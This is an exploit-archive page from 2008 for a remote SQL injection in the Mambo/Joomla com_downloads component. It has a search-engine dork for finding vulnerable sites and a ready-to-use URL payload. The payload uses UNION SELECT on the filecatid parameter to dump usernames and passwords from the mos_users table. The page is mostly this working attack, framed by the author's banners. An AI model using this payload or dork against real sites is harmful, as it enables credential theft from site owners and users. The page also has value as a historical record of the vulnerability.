[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo Component com_downloads Remote SQL Injection Vulnerability
# Published : 2008-02-06
# Author : S@BUN
# Previous Title : Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
# Next Title : Mihalism Multi Host Download (Username) Blind SQL Injection Exploit
#########################################################################
#
# joomla SQL Injection(com_downloads)(filecatid)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl :"com_downloads"filecatid
#
##########################################################################
EXPLOIT :
index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
##########################################################################
# S@BUN www.hackturkiye.com S@BUN
##########################################################################
# S@BUN i AM NOT HACKER S@BUN
##########################################################################
# www.Syue.com [2008-02-06]